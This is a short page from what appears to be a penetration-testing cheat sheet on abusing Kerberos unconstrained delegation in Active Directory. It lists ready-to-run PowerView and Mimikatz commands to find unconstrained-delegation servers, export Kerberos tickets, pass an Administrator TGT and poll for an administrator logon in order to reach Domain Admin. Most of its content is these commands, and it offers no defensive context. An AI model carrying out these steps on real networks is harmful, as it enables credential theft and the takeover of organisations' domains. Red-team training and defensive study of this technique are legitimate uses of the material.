UNCONSTRAINED DELEGATION

Unconstrained Delegation Access can be used via Servers

Enumerate servers with Unconstrained Delegation

Get-NetComputer -Unconstrained | Select -ExpandProperty name

To compromise another service with the listed services using Unconstrained Delegation, we need Admin privileges on the listed servers

After gaining Admin privilege on the server,

Export the tickets

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

If you find any TGT ticket with "Administrator" privilege

You can "Pass The Ticket" to gain Domain Admin access on the unconstrained delegated server

Invoke-Mimikatz -Command '"kerberos::ptt <TGT TICKET PATH>"'

If you cannot find any TGT from "Administrator", we can wait for "Administrator" to access the Unconstrained Delegated server

Invoke-UserHunter -ComputerName <UNCONSTRAINED DELEGATED SERVER> -Poll 100 -UserName Administrator -Delay 5
PreviousTARGETED AS-REP ROASTINGNextCONSTRAINED DELEGATION

Last updated